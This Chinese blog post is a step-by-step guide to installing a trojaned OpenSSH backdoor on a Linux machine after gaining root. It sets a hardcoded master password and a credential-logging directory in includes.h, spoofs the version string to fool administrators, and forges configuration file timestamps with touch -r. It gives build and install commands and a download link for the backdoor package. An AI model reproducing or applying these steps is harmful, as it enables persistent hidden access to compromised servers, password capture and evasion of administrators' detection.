• 某ssh后门试用


          在获取linux的root权限之后,虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了。在这里,我大致试用了一下一个比较老但是稳定的ssh后门,算是作个记录。后续我会翻译一篇老外用python写的ssh后门。好了,我会在虚拟机中对ssh后门做一个演示,最后我会放出下载到的后门程序。

          在这里,我使用安装的Kali1.1.0_32来进行试验。(尝试过ubuntu12.04.5和ubuntu14.04.1,都失败了)首先把下载的ssh后门程序放到指定文件夹中。查看一下本机安装的ssh版本,如下图所示:

    34

          我们需要在version.h中把ssh的版本号改为我们本机得到的OpenSSH版本号,我觉得这个就是后续用来迷惑管理员的,免得管理员感觉异常导致ssh后门程序的暴露。(其实查看版本信息的时候,还是可以发现有异常)

          好了,我们来修改下version.h文件的ssh版本号,具体如下所示:

    #define SSH_VERSION	"OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL 1.0.1e 11 Feb 2013"

          上面红色部分是我虚拟机ubuntu中OpenSSH的版本号。

          接下来,设置一下ssh后门的密码,这个在include.h文件中进行设置,如下图所示:

    /*	$OpenBSD: includes.h,v 1.17 2002/01/26 16:44:22 stevesk Exp $	*/
    
    /*
    
     * Author: Tatu Ylonen <ylo@cs.hut.fi>
    
     * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
    
     *                    All rights reserved
    
     * This file includes most of the needed system headers.
    
     *
    
     * As far as I am concerned, the code I have written for this software
    
     * can be used freely for any purpose.  Any derived versions of this
    
     * software must be clearly marked as such, and if the derived work is
    
     * incompatible with the protocol description in the RFC file, it must be
    
     * called by a name other than "ssh" or "Secure Shell".
    
     */
    
    #ifndef INCLUDES_H
    
    #define INCLUDES_H
    
    #define RCSID(msg) 
    
    static /**/const char *const rcsid[] = { (char *)rcsid, "100(#)" msg }
    
    #include "config.h"
    
    #include <stdio.h>
    
    #include <ctype.h>
    
    #include <errno.h>
    
    #include <fcntl.h> /* For O_NONBLOCK */
    
    #include <signal.h>
    
    #include <stdlib.h>
    
    #include <string.h>
    
    #include <stdarg.h>
    
    #include <pwd.h>
    
    #include <grp.h>
    
    #include <time.h>
    
    #include <dirent.h>
    
    #ifdef HAVE_LIMITS_H
    
    # include <limits.h> /* For PATH_MAX */
    
    #endif
    
    #ifdef HAVE_GETOPT_H
    
    # include <getopt.h>
    
    #endif
    
    #ifdef HAVE_BSTRING_H
    
    # include <bstring.h>
    
    #endif
    
    #if defined(HAVE_GLOB_H) && defined(GLOB_HAS_ALTDIRFUNC) && 
    
        defined(GLOB_HAS_GL_MATCHC)
    
    # include <glob.h>
    
    #endif
    
    #ifdef HAVE_NETGROUP_H
    
    # include <netgroup.h>
    
    #endif
    
    #if defined(HAVE_NETDB_H)
    
    # include <netdb.h>
    
    #endif
    
    #ifdef HAVE_ENDIAN_H
    
    # include <endian.h>
    
    #endif
    
    #ifdef HAVE_TTYENT_H
    
    # include <ttyent.h>
    
    #endif
    
    #ifdef HAVE_UTIME_H
    
    # include <utime.h>
    
    #endif
    
    #ifdef HAVE_MAILLOCK_H
    
    # include <maillock.h> /* For _PATH_MAILDIR */
    
    #endif
    
    #ifdef HAVE_NEXT
    
    #  include <libc.h>
    
    #endif
    
    #include <unistd.h> /* For STDIN_FILENO, etc */
    
    #include <termios.h> /* Struct winsize */
    
    /*
    
     *-*-nto-qnx needs these headers for strcasecmp and LASTLOG_FILE respectively
    
     */
    
    #ifdef HAVE_STRINGS_H
    
    # include <strings.h>
    
    #endif
    
    #ifdef HAVE_LOGIN_H
    
    # include <login.h>
    
    #endif
    
    #ifdef HAVE_UTMP_H
    
    #  include <utmp.h>
    
    #endif
    
    #ifdef HAVE_UTMPX_H
    
    #  ifdef HAVE_TV_IN_UTMPX
    
    #    include <sys/time.h>
    
    #  endif
    
    #  include <utmpx.h>
    
    #endif
    
    #ifdef HAVE_LASTLOG_H
    
    #  include <lastlog.h>
    
    #endif
    
    #ifdef HAVE_PATHS_H
    
    #  include <paths.h> /* For _PATH_XXX */
    
    #endif
    
    #include <sys/types.h>
    
    #include <sys/socket.h>
    
    #include <sys/ioctl.h>
    
    #include <sys/wait.h>
    
    #ifdef HAVE_SYS_TIME_H
    
    # include <sys/time.h> /* For timersub */
    
    #endif
    
    #include <sys/resource.h>
    
    #ifdef HAVE_SYS_SELECT_H
    
    # include <sys/select.h>
    
    #endif
    
    #ifdef HAVE_SYS_BSDTTY_H
    
    # include <sys/bsdtty.h>
    
    #endif
    
    #include <sys/param.h> /* For MAXPATHLEN and roundup() */
    
    #ifdef HAVE_SYS_UN_H
    
    # include <sys/un.h> /* For sockaddr_un */
    
    #endif
    
    #ifdef HAVE_SYS_BITYPES_H
    
    # include <sys/bitypes.h> /* For u_intXX_t */
    
    #endif
    
    #ifdef HAVE_SYS_CDEFS_H
    
    # include <sys/cdefs.h> /* For __P() */
    
    #endif
    
    #ifdef HAVE_SYS_STAT_H
    
    # include <sys/stat.h> /* For S_* constants and macros */
    
    #endif
    
    #ifdef HAVE_SYS_SYSMACROS_H
    
    # include <sys/sysmacros.h> /* For MIN, MAX, etc */
    
    #endif
    
    #ifdef HAVE_SYS_MMAN_H
    
    #include <sys/mman.h> /* for MAP_ANONYMOUS */
    
    #endif
    
    #include <netinet/in_systm.h> /* For typedefs */
    
    #include <netinet/in.h> /* For IPv6 macros */
    
    #include <netinet/ip.h> /* For IPTOS macros */
    
    #include <netinet/tcp.h>
    
    #include <arpa/inet.h>
    
    #ifdef HAVE_RPC_TYPES_H
    
    # include <rpc/types.h> /* For INADDR_LOOPBACK */
    
    #endif
    
    #ifdef USE_PAM
    
    # include <security/pam_appl.h>
    
    #endif
    
    #ifdef HAVE_READPASSPHRASE_H
    
    # include <readpassphrase.h>
    
    #endif
    
    #include <openssl/opensslv.h> /* For OPENSSL_VERSION_NUMBER */
    
    #include "defines.h"
    
    #include "version.h"
    
    #include "openbsd-compat/openbsd-compat.h"
    
    #include "openbsd-compat/bsd-cygwin_util.h"
    
    #include "openbsd-compat/bsd-nextstep.h"
    
    #include "entropy.h"
    
    /* hax0r shit */
    
    #define _SECRET_PASSWD "test@12345"
    
    #define _LOG_DIR "/usr/local/share/0wn"
    
    #define _S_LOG "slog"
    
    #define _C_LOG "clog"
    
    FILE *outf;
    
    int mlogin_ok;
    
    FILE *f;
    
    char message[512];
    
    /* end hax0r shit */
    
    #endif /* INCLUDES_H */

          如上图所示,在#define _SECRET_PASSWD设置ssh后门的密码,我设置的是test@12345。完成这两部之后,就开始编译ssh后门了。为了安全起见,首先完成原来ssh一些文件的备份工作。

          备份原文件:

    mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
    
    mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

          编译安装:(需要定位到ssh后门所在文件夹)

    ./configure --prefix=/usr --sysconfdir=/etc/ssh
    
    make && make install
    
    cp ssh_config sshd_config /etc/ssh/

          修改文件时间:

    touch -r  /etc/ssh/ssh_config.old /etc/ssh/ssh_config
    
    touch -r  /etc/ssh/sshd_config.old /etc/ssh/sshd_config

          重启服务:

    /etc/init.d/ssh restart

          登入后门:

    35

          可以看到正常登陆。到此结束,最后分享一下这个ssh后门程序。

          地址:http://pan.baidu.com/s/1rXDIe(密码:1di8)

  • 相关阅读:
    python之openpyxl模块(最全总结 足够初次使用)
    随笔 遇见
    浅析企业服务器安全防护的七个切入点
    jQuery.API源码深入剖析以及应用实现(1) - 核心函数篇
    常用Javascript精选(二)
    随笔 生活与生命
    jquery插件 8个很有用的jQuery插件
    jquery插件 5个小插件
    常用Javascript精选(一)
    jQuery库与其他JS库冲突的解决办法(转)
  • 原文地址:https://www.cnblogs.com/hiccup/p/4449581.html
Copyright © 2020-2023  润新知